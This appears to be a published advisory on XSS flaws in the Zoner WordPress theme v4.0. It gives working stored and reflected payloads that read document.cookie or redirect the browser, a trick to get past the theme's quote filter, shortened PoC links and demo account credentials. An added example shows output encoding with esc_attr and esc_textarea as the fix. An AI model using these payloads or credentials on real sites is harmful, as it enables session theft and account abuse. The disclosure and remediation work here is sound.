Zoner - Real Estate WordPress Theme v4.0 Reflected & Stored XSS Injections

2019.04.26
QUIXSS (RU)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[*] :: Title: Zoner - Real Estate WordPress Theme v4.0 Reflected & Stored XSS Injections
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-26
[*] :: Software: Zoner - Real Estate WordPress Theme v4.0

[?] :: Technical Details & Description:
# Weak security measures, namely insufficient filtering of input field data, have been discovered in the «Zoner - Real Estate WordPress Theme». The current version of this premium WordPress theme is 4.0.

[?] :: Demo Website:
# https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226
# Frontend: https://zoner.fruitfulcode.com/home_v/1/
# Backend (user): https://zoner.fruitfulcode.com/sign-in/
# Login/Password (user): natokebow@quickmail.best/CvfWo(SY

[!] :: Special Note:
# 1,575 sales

[!] :: For developers:
# Disabling data changes on a demo website does not make your application more secure. It may be good for business and sales, but you are simply deceiving your clients.

[+] :: PoC [Links]:
# https://zoner.fruitfulcode.com/home_v/1/ (needs authorization)
# https://zoner.fruitfulcode.com/author/quixss/?profile-page=my_profile (needs authorization)
# http://tiny.cc/quixss (Reflected XSS with cookie alert)
# http://tiny.cc/quixss2 (Reflected XSS with redirect)

[+] :: PoC [Stored XSS Injection]:
# Log in to the demo website as a regular user, then go to any page with a text field, e.g. https://zoner.fruitfulcode.com/author/quixss/?profile-page=my_profile
# Inside any text field, type "> first to close the input element's value attribute, then add your payload and save the data; the stored value is rendered back into the page unencoded and the code executes. For a text box (textarea), use </textarea> instead of "> before the payload.
# Sample payload #1: "><script>alert('QUIXSS')</script>
# Sample payload #2: "><img src="x" onerror="alert('QUIXSS');">

[+] :: PoC [Reflected XSS Injection]:
# Go to any page with the «Search Your Property» form, e.g. https://zoner.fruitfulcode.com/home_v/3/, and place the payload in the «Keyword» input field.
# Keep in mind that quotes inside the payload are filtered, but this can be bypassed by using backtick (`) template literals or by avoiding string literals altogether (see the provided samples).
# Sample payload #1: "><img src="x" onerror="alert(document.cookie)">
# Sample payload #2: "><img src="x" onerror=window.location.replace(`https://twitter.com/quixss`)>
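The following is an added example, not code from the Zoner theme or from the advisory author. It models the two injection contexts described above, an `<input value="...">` attribute and a `<textarea>` body, and approximates the "quotes are filtered" behaviour by stripping single quotes from the search keyword (an assumption; the advisory does not say exactly what the theme filters). The field names `keyword`, `display_name` and `bio` are placeholders. The point it demonstrates is that the sample payloads break out of their context whenever the value is interpolated raw, and that contextual output encoding, rather than an input filter, neutralises all of them.

```javascript
// Added example (not Zoner theme code). Hypothetical templates that mimic the
// two vulnerable contexts from the advisory, a quote filter modelled as
// stripping ' (assumption), and a hardened variant that encodes on output.

// Hypothetical model of the search form's filter: removes ' but leaves " and `.
function stripSingleQuotes(s) {
  return String(s).replace(/'/g, "");
}

// Vulnerable renderers: user-controlled values land in markup unencoded.
function renderSearchVulnerable(keyword) {
  return `<input type="text" name="keyword" value="${stripSingleQuotes(keyword)}">`;
}
function renderProfileVulnerable(displayName, bio) {
  return `<input type="text" name="display_name" value="${displayName}">` +
         `<textarea name="bio">${bio}</textarea>`;
}

// HTML entity encoding that is safe for both attribute values and element text.
// The backtick is included because old Internet Explorer accepted it as an
// attribute delimiter.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "`": "&#96;" };
  return String(s).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Hardened renderers: same templates, values encoded for the context they land in.
function renderSearchHardened(keyword) {
  return `<input type="text" name="keyword" value="${escapeHtml(keyword)}">`;
}
function renderProfileHardened(displayName, bio) {
  return `<input type="text" name="display_name" value="${escapeHtml(displayName)}">` +
         `<textarea name="bio">${escapeHtml(bio)}</textarea>`;
}

// Names of tags in the rendered markup other than the two the template itself
// emits. Non-empty means the value crossed its attribute/textarea boundary.
// (A regex is not an HTML parser, but it suffices to show the boundary crossing.)
function injectedTags(html) {
  const names = [...html.matchAll(/<\s*\/?\s*([a-zA-Z][a-zA-Z0-9]*)/g)].map((m) => m[1].toLowerCase());
  return names.filter((n) => n !== "input" && n !== "textarea");
}

// The advisory's sample payloads, verbatim, tagged with the context they target.
const PAYLOADS = [
  { name: "stored1", context: "profile-attr", payload: `"><script>alert('QUIXSS')</script>` },
  { name: "stored2", context: "profile-attr", payload: `"><img src="x" onerror="alert('QUIXSS');">` },
  { name: "textarea", context: "profile-textarea", payload: `</textarea><img src="x" onerror="alert('QUIXSS');">` },
  { name: "reflected1", context: "search", payload: `"><img src="x" onerror="alert(document.cookie)">` },
  { name: "reflected2", context: "search", payload: '"><img src="x" onerror=window.location.replace(`https://twitter.com/quixss`)>' },
];

// Renders each payload through the vulnerable and hardened templates and
// reports which ones inject a tag, plus whether the single-quote filter would
// have left the payload intact (why the reflected samples avoid ' entirely).
function evaluatePayloads() {
  const results = {};
  for (const { name, context, payload } of PAYLOADS) {
    let vulnerable, hardened;
    if (context === "search") {
      vulnerable = renderSearchVulnerable(payload);
      hardened = renderSearchHardened(payload);
    } else if (context === "profile-attr") {
      vulnerable = renderProfileVulnerable(payload, "bio text");
      hardened = renderProfileHardened(payload, "bio text");
    } else {
      vulnerable = renderProfileVulnerable("QUIXSS", payload);
      hardened = renderProfileHardened("QUIXSS", payload);
    }
    results[name] = {
      vulnerableInjects: injectedTags(vulnerable),
      hardenedInjects: injectedTags(hardened),
      survivesQuoteFilter: stripSingleQuotes(payload) === payload,
    };
  }
  return results;
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(evaluatePayloads());
}
```

Running the file prints a table in which every payload injects a tag through the vulnerable templates and none through the hardened ones; the two reflected samples are also the only ones the modelled quote filter leaves untouched, which is why they use `document.cookie` and a backtick template literal instead of `'...'` strings. In WordPress terms the fix is the same as `renderSearchHardened` and `renderProfileHardened`: pass attribute values through `esc_attr()` and textarea content through `esc_textarea()` at output time rather than trying to filter characters on input.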

References:

https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226

Copyright 2019, cxsecurity.com